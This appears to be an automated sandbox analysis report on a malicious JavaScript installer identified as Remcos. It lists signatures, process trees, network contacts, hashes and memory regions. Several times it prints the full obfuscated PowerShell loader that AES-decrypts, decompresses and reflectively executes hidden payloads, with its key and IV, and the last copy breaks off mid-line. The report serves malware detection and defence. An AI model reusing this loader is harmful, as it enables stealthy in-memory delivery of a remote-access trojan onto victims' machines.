Analysis Overview
SHA256
5ede5ee989e327b0562583e3f7563d691b5c1a6ade7804d4c871df84633b5845
Threat Level: Known bad
The file 03042024_2143_Install.js was found to be: Known bad.
Malicious Activity Summary
Remcos
Blocklisted process makes network request
Checks computer location settings
Drops startup file
Enumerates physical storage devices
Suspicious use of SetWindowsHookEx
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Script User-Agent
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-04-03 13:43
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-04-03 13:43
Reported
2024-04-03 13:46
Platform
win7-20240221-en
Max time kernel
119s
Max time network
122s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\system32\wscript.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
|---|---|---|---|
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\putty.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Script User-Agent
| Description | Indicator | Process | Target |
|---|---|---|---|
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\03042024_2143_Install.js
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| US | 8.8.8.8:53 | rentry.co | udp |
| US | 104.21.95.148:443 | rentry.co | tcp |
Files
memory/2744-5-0x000000001B340000-0x000000001B622000-memory.dmp
memory/2744-6-0x00000000024E0000-0x00000000024E8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tempScript.ps1
| MD5 | 1449878eb9e0b72365906e10545b3a63 |
| SHA1 | 27c596b59b6ff8024ba1e47a74a2d11a018315aa |
| SHA256 | dcbee82699901eebd224bf5d350ecd713c947da38e7d4a1dc2be04744dd035c9 |
| SHA512 | ed78aa6441f6f5ea160257b19ed1515eb29bc6a05d6bfe887f8776f101028e5cc629387f51223a69876f459fe6af6b472ac595556e952e802746fc0bce329fad |
memory/2744-8-0x000007FEF5500000-0x000007FEF5E9D000-memory.dmp
memory/2744-9-0x0000000001FC0000-0x0000000002040000-memory.dmp
memory/2744-11-0x0000000001FC0000-0x0000000002040000-memory.dmp
memory/2744-10-0x000007FEF5500000-0x000007FEF5E9D000-memory.dmp
memory/2744-12-0x0000000001FC0000-0x0000000002040000-memory.dmp
memory/2744-14-0x000007FEF5500000-0x000007FEF5E9D000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | a3e096d826767224c5de102c76cda71e |
| SHA1 | 700969c1d380376431e16d8d682ea10bba5a25a4 |
| SHA256 | 9a819572ec656a2f3b2824db8baf08f019296b841b6c6c7b097bd59f430544f0 |
| SHA512 | 32bdb6b7b00d542c569a291013e924a4d45953f61f8db675428a890ad6c7ba5b8be9aab1adf2a36e73d732951e5071e0bf4b79613f3c04c93ff58135460caf4c |
memory/2524-21-0x000000001B190000-0x000000001B472000-memory.dmp
memory/2524-24-0x0000000001DB0000-0x0000000001E30000-memory.dmp
memory/2524-23-0x000007FEF4B60000-0x000007FEF54FD000-memory.dmp
memory/2524-22-0x0000000001FC0000-0x0000000001FC8000-memory.dmp
memory/2524-25-0x000007FEF4B60000-0x000007FEF54FD000-memory.dmp
memory/2524-26-0x0000000001DB0000-0x0000000001E30000-memory.dmp
memory/2524-27-0x0000000001DB0000-0x0000000001E30000-memory.dmp
memory/2524-28-0x0000000001DB0000-0x0000000001E30000-memory.dmp
memory/2524-30-0x000007FEF4B60000-0x000007FEF54FD000-memory.dmp
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/2440-38-0x000007FEF5500000-0x000007FEF5E9D000-memory.dmp
memory/2440-39-0x00000000028C0000-0x0000000002940000-memory.dmp
memory/2440-40-0x000007FEF5500000-0x000007FEF5E9D000-memory.dmp
memory/2440-41-0x00000000028C0000-0x0000000002940000-memory.dmp
memory/2440-42-0x00000000028C0000-0x0000000002940000-memory.dmp
memory/2440-44-0x000007FEF5500000-0x000007FEF5E9D000-memory.dmp
memory/340-52-0x000007FEF4B60000-0x000007FEF54FD000-memory.dmp
memory/340-53-0x00000000028A0000-0x0000000002920000-memory.dmp
memory/340-54-0x000007FEF4B60000-0x000007FEF54FD000-memory.dmp
memory/340-55-0x00000000028A0000-0x0000000002920000-memory.dmp
memory/340-56-0x00000000028A0000-0x0000000002920000-memory.dmp
memory/340-58-0x000007FEF4B60000-0x000007FEF54FD000-memory.dmp
memory/1032-65-0x000007FEF5500000-0x000007FEF5E9D000-memory.dmp
memory/1032-66-0x0000000002500000-0x0000000002580000-memory.dmp
memory/1032-67-0x000007FEF5500000-0x000007FEF5E9D000-memory.dmp
memory/1032-68-0x0000000002500000-0x0000000002580000-memory.dmp
memory/1032-69-0x0000000002500000-0x0000000002580000-memory.dmp
memory/1032-71-0x0000000002500000-0x0000000002580000-memory.dmp
memory/1032-72-0x000007FEF5500000-0x000007FEF5E9D000-memory.dmp
memory/1768-79-0x000007FEF4B60000-0x000007FEF54FD000-memory.dmp
memory/1768-80-0x0000000002560000-0x00000000025E0000-memory.dmp
memory/1768-82-0x000007FEF4B60000-0x000007FEF54FD000-memory.dmp
memory/1768-83-0x0000000002560000-0x00000000025E0000-memory.dmp
memory/1768-84-0x0000000002560000-0x00000000025E0000-memory.dmp
memory/1768-85-0x000007FEF4B60000-0x000007FEF54FD000-memory.dmp
memory/992-93-0x000007FEF5500000-0x000007FEF5E9D000-memory.dmp
memory/992-94-0x0000000002900000-0x0000000002980000-memory.dmp
memory/992-96-0x000007FEF5500000-0x000007FEF5E9D000-memory.dmp
memory/992-97-0x0000000002900000-0x0000000002980000-memory.dmp
memory/992-98-0x0000000002900000-0x0000000002980000-memory.dmp
memory/992-99-0x0000000002900000-0x0000000002980000-memory.dmp
memory/992-100-0x000007FEF5500000-0x000007FEF5E9D000-memory.dmp
memory/1556-107-0x000007FEF4B60000-0x000007FEF54FD000-memory.dmp
memory/1556-108-0x00000000024D0000-0x0000000002550000-memory.dmp
memory/1556-109-0x000007FEF4B60000-0x000007FEF54FD000-memory.dmp
memory/1556-110-0x00000000024D0000-0x0000000002550000-memory.dmp
memory/1556-111-0x00000000024D0000-0x0000000002550000-memory.dmp
memory/1556-112-0x00000000024D0000-0x0000000002550000-memory.dmp
memory/1556-114-0x000007FEF4B60000-0x000007FEF54FD000-memory.dmp
memory/2088-122-0x000007FEF5500000-0x000007FEF5E9D000-memory.dmp
memory/2088-123-0x0000000002800000-0x0000000002880000-memory.dmp
memory/2088-124-0x000007FEF5500000-0x000007FEF5E9D000-memory.dmp
memory/2088-125-0x0000000002800000-0x0000000002880000-memory.dmp
memory/2088-126-0x0000000002800000-0x0000000002880000-memory.dmp
memory/2088-128-0x000007FEF5500000-0x000007FEF5E9D000-memory.dmp
memory/1616-135-0x000007FEF4B60000-0x000007FEF54FD000-memory.dmp
memory/1616-136-0x00000000024F0000-0x0000000002570000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-04-03 13:43
Reported
2024-04-03 13:46
Platform
win10v2004-20231215-en
Max time kernel
150s
Max time network
151s
Command Line
Signatures
Remcos
Blocklisted process makes network request
Checks computer location settings
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key value queried | \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\wscript.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
|---|---|---|---|
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\putty.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Script User-Agent
| Description | Indicator | Process | Target |
|---|---|---|---|
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\03042024_2143_Install.js
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\putty.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\putty.cmd';$rFXv='EnGBSCtryGBSCPGBSCoinGBSCtGBSC'.Replace('GBSC', ''),'CUIjOrUIjOeaUIjOteUIjODecUIjOrypUIjOtoUIjOrUIjO'.Replace('UIjO', ''),'CoQiCfpyQiCfToQiCf'.Replace('QiCf', ''),'ChaTJBbngeTJBbETJBbxTJBbtTJBbenTJBbsTJBbionTJBb'.Replace('TJBb', ''),'GUkIbetUkIbCuUkIbrUkIbrenUkIbtUkIbProUkIbcesUkIbsUkIb'.Replace('UkIb', ''),'InPAfavokPAfaePAfa'.Replace('PAfa', ''),'RBJyxeaBJyxdLBJyxiBJyxnBJyxesBJyx'.Replace('BJyx', ''),'DeSxuocoSxuompSxuorSxuoesSxuosSxuo'.Replace('Sxuo', ''),'ElebIuGmebIuGnbIuGtAbIuGtbIuG'.Replace('bIuG', ''),'LoahPUvdhPUv'.Replace('hPUv', ''),'MDxyiaDxyiiDxyinMDxyiodDxyiulDxyieDxyi'.Replace('Dxyi', ''),'FrtzKpomBtzKpatzKpsetzKp64tzKpSttzKprintzKpgtzKp'.Replace('tzKp', ''),'SpxkWylixkWytxkWy'.Replace('xkWy', ''),'TrqXeEanqXeEsqXeEforqXeEmFqXeEinqXeEalqXeEBlqXeEoqXeEckqXeE'.Replace('qXeE', '');powershell -w hidden;function HtjiD($WhcRa){$RxMuP=[System.Security.Cryptography.Aes]::Create();$RxMuP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$RxMuP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$RxMuP.Key=[System.Convert]::($rFXv[11])('6qfBajAjBLLLERsnjnVCaHssNnxliyfTegST0BRO04Q=');$RxMuP.IV=[System.Convert]::($rFXv[11])('/1orvBajL3CcAQUeEJe3RA==');$AKtbO=$RxMuP.($rFXv[1])();$wCZVX=$AKtbO.($rFXv[13])($WhcRa,0,$WhcRa.Length);$AKtbO.Dispose();$RxMuP.Dispose();$wCZVX;}function mcKuT($WhcRa){$sdKwh=New-Object System.IO.MemoryStream(,$WhcRa);$KcOxl=New-Object System.IO.MemoryStream;$DtaLI=New-Object System.IO.Compression.GZipStream($sdKwh,[IO.Compression.CompressionMode]::($rFXv[7]));$DtaLI.($rFXv[2])($KcOxl);$DtaLI.Dispose();$sdKwh.Dispose();$KcOxl.Dispose();$KcOxl.ToArray();}$HVnbx=[System.IO.File]::($rFXv[6])([Console]::Title);$kqnRx=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 5).Substring(2))));$YFqfz=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 
6).Substring(2))));[System.Reflection.Assembly]::($rFXv[9])([byte[]]$YFqfz).($rFXv[0]).($rFXv[5])($null,$null);[System.Reflection.Assembly]::($rFXv[9])([byte[]]$kqnRx).($rFXv[0]).($rFXv[5])($null,$null); "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\putty.cmd
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\putty.cmd';$rFXv='EnGBSCtryGBSCPGBSCoinGBSCtGBSC'.Replace('GBSC', ''),'CUIjOrUIjOeaUIjOteUIjODecUIjOrypUIjOtoUIjOrUIjO'.Replace('UIjO', ''),'CoQiCfpyQiCfToQiCf'.Replace('QiCf', ''),'ChaTJBbngeTJBbETJBbxTJBbtTJBbenTJBbsTJBbionTJBb'.Replace('TJBb', ''),'GUkIbetUkIbCuUkIbrUkIbrenUkIbtUkIbProUkIbcesUkIbsUkIb'.Replace('UkIb', ''),'InPAfavokPAfaePAfa'.Replace('PAfa', ''),'RBJyxeaBJyxdLBJyxiBJyxnBJyxesBJyx'.Replace('BJyx', ''),'DeSxuocoSxuompSxuorSxuoesSxuosSxuo'.Replace('Sxuo', ''),'ElebIuGmebIuGnbIuGtAbIuGtbIuG'.Replace('bIuG', ''),'LoahPUvdhPUv'.Replace('hPUv', ''),'MDxyiaDxyiiDxyinMDxyiodDxyiulDxyieDxyi'.Replace('Dxyi', ''),'FrtzKpomBtzKpatzKpsetzKp64tzKpSttzKprintzKpgtzKp'.Replace('tzKp', ''),'SpxkWylixkWytxkWy'.Replace('xkWy', ''),'TrqXeEanqXeEsqXeEforqXeEmFqXeEinqXeEalqXeEBlqXeEoqXeEckqXeE'.Replace('qXeE', '');powershell -w hidden;function HtjiD($WhcRa){$RxMuP=[System.Security.Cryptography.Aes]::Create();$RxMuP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$RxMuP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$RxMuP.Key=[System.Convert]::($rFXv[11])('6qfBajAjBLLLERsnjnVCaHssNnxliyfTegST0BRO04Q=');$RxMuP.IV=[System.Convert]::($rFXv[11])('/1orvBajL3CcAQUeEJe3RA==');$AKtbO=$RxMuP.($rFXv[1])();$wCZVX=$AKtbO.($rFXv[13])($WhcRa,0,$WhcRa.Length);$AKtbO.Dispose();$RxMuP.Dispose();$wCZVX;}function mcKuT($WhcRa){$sdKwh=New-Object System.IO.MemoryStream(,$WhcRa);$KcOxl=New-Object System.IO.MemoryStream;$DtaLI=New-Object System.IO.Compression.GZipStream($sdKwh,[IO.Compression.CompressionMode]::($rFXv[7]));$DtaLI.($rFXv[2])($KcOxl);$DtaLI.Dispose();$sdKwh.Dispose();$KcOxl.Dispose();$KcOxl.ToArray();}$HVnbx=[System.IO.File]::($rFXv[6])([Console]::Title);$kqnRx=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 5).Substring(2))));$YFqfz=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 
6).Substring(2))));[System.Reflection.Assembly]::($rFXv[9])([byte[]]$YFqfz).($rFXv[0]).($rFXv[5])($null,$null);[System.Reflection.Assembly]::($rFXv[9])([byte[]]$kqnRx).($rFXv[0]).($rFXv[5])($null,$null); "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\putty.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\putty.cmd';$rFXv='EnGBSCtryGBSCPGBSCoinGBSCtGBSC'.Replace('GBSC', ''),'CUIjOrUIjOeaUIjOteUIjODecUIjOrypUIjOtoUIjOrUIjO'.Replace('UIjO', ''),'CoQiCfpyQiCfToQiCf'.Replace('QiCf', ''),'ChaTJBbngeTJBbETJBbxTJBbtTJBbenTJBbsTJBbionTJBb'.Replace('TJBb', ''),'GUkIbetUkIbCuUkIbrUkIbrenUkIbtUkIbProUkIbcesUkIbsUkIb'.Replace('UkIb', ''),'InPAfavokPAfaePAfa'.Replace('PAfa', ''),'RBJyxeaBJyxdLBJyxiBJyxnBJyxesBJyx'.Replace('BJyx', ''),'DeSxuocoSxuompSxuorSxuoesSxuosSxuo'.Replace('Sxuo', ''),'ElebIuGmebIuGnbIuGtAbIuGtbIuG'.Replace('bIuG', ''),'LoahPUvdhPUv'.Replace('hPUv', ''),'MDxyiaDxyiiDxyinMDxyiodDxyiulDxyieDxyi'.Replace('Dxyi', ''),'FrtzKpomBtzKpatzKpsetzKp64tzKpSttzKprintzKpgtzKp'.Replace('tzKp', ''),'SpxkWylixkWytxkWy'.Replace('xkWy', ''),'TrqXeEanqXeEsqXeEforqXeEmFqXeEinqXeEalqXeEBlqXeEoqXeEckqXeE'.Replace('qXeE', '');powershell -w hidden;function HtjiD($WhcRa){$RxMuP=[System.Security.Cryptography.Aes]::Create();$RxMuP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$RxMuP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$RxMuP.Key=[System.Convert]::($rFXv[11])('6qfBajAjBLLLERsnjnVCaHssNnxliyfTegST0BRO04Q=');$RxMuP.IV=[System.Convert]::($rFXv[11])('/1orvBajL3CcAQUeEJe3RA==');$AKtbO=$RxMuP.($rFXv[1])();$wCZVX=$AKtbO.($rFXv[13])($WhcRa,0,$WhcRa.Length);$AKtbO.Dispose();$RxMuP.Dispose();$wCZVX;}function mcKuT($WhcRa){$sdKwh=New-Object System.IO.MemoryStream(,$WhcRa);$KcOxl=New-Object System.IO.MemoryStream;$DtaLI=New-Object System.IO.Compression.GZipStream($sdKwh,[IO.Compression.CompressionMode]::($rFXv[7]));$DtaLI.($rFXv[2])($KcOxl);$DtaLI.Dispose();$sdKwh.Dispose();$KcOxl.Dispose();$KcOxl.ToArray();}$HVnbx=[System.IO.File]::($rFXv[6])([Console]::Title);$kqnRx=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 5).Substring(2))));$YFqfz=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 
6).Substring(2))));[System.Reflection.Assembly]::($rFXv[9])([byte[]]$YFqfz).($rFXv[0]).($rFXv[5])($null,$null);[System.Reflection.Assembly]::($rFXv[9])([byte[]]$kqnRx).($rFXv[0]).($rFXv[5])($null,$null); "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\putty.cmd
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\putty.cmd';$rFXv='EnGBSCtryGBSCPGBSCoinGBSCtGBSC'.Replace('GBSC', ''),'CUIjOrUIjOeaUIjOteUIjODecUIjOrypUIjOtoUIjOrUIjO'.Replace('UIjO', ''),'CoQiCfpyQiCfToQiCf'.Replace('QiCf', ''),'ChaTJBbngeTJBbETJBbxTJBbtTJBbenTJBbsTJBbionTJBb'.Replace('TJBb', ''),'GUkIbetUkIbCuUkIbrUkIbrenUkIbtUkIbProUkIbcesUkIbsUkIb'.Replace('UkIb', ''),'InPAfavokPAfaePAfa'.Replace('PAfa', ''),'RBJyxeaBJyxdLBJyxiBJyxnBJyxesBJyx'.Replace('BJyx', ''),'DeSxuocoSxuompSxuorSxuoesSxuosSxuo'.Replace('Sxuo', ''),'ElebIuGmebIuGnbIuGtAbIuGtbIuG'.Replace('bIuG', ''),'LoahPUvdhPUv'.Replace('hPUv', ''),'MDxyiaDxyiiDxyinMDxyiodDxyiulDxyieDxyi'.Replace('Dxyi', ''),'FrtzKpomBtzKpatzKpsetzKp64tzKpSttzKprintzKpgtzKp'.Replace('tzKp', ''),'SpxkWylixkWytxkWy'.Replace('xkWy', ''),'TrqXeEanqXeEsqXeEforqXeEmFqXeEinqXeEalqXeEBlqXeEoqXeEckqXeE'.Replace('qXeE', '');powershell -w hidden;function HtjiD($WhcRa){$RxMuP=[System.Security.Cryptography.Aes]::Create();$RxMuP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$RxMuP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$RxMuP.Key=[System.Convert]::($rFXv[11])('6qfBajAjBLLLERsnjnVCaHssNnxliyfTegST0BRO04Q=');$RxMuP.IV=[System.Convert]::($rFXv[11])('/1orvBajL3CcAQUeEJe3RA==');$AKtbO=$RxMuP.($rFXv[1])();$wCZVX=$AKtbO.($rFXv[13])($WhcRa,0,$WhcRa.Length);$AKtbO.Dispose();$RxMuP.Dispose();$wCZVX;}function mcKuT($WhcRa){$sdKwh=New-Object System.IO.MemoryStream(,$WhcRa);$KcOxl=New-Object System.IO.MemoryStream;$DtaLI=New-Object 